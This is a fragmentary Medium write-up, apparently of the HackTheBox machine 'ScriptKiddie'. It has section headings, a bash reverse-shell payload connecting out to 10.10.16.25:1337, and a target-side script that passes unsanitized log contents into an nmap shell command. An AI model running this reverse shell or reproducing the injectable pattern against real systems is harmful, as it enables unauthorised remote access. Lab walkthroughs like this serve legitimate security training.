HackTheBox — ScriptKiddie

Nmap scan

HTTP Enumeration

payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"' 

Initial Foothold/User

Lateral Movement

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Getting root

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xEmbo

0xEmbo

15 Followers

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.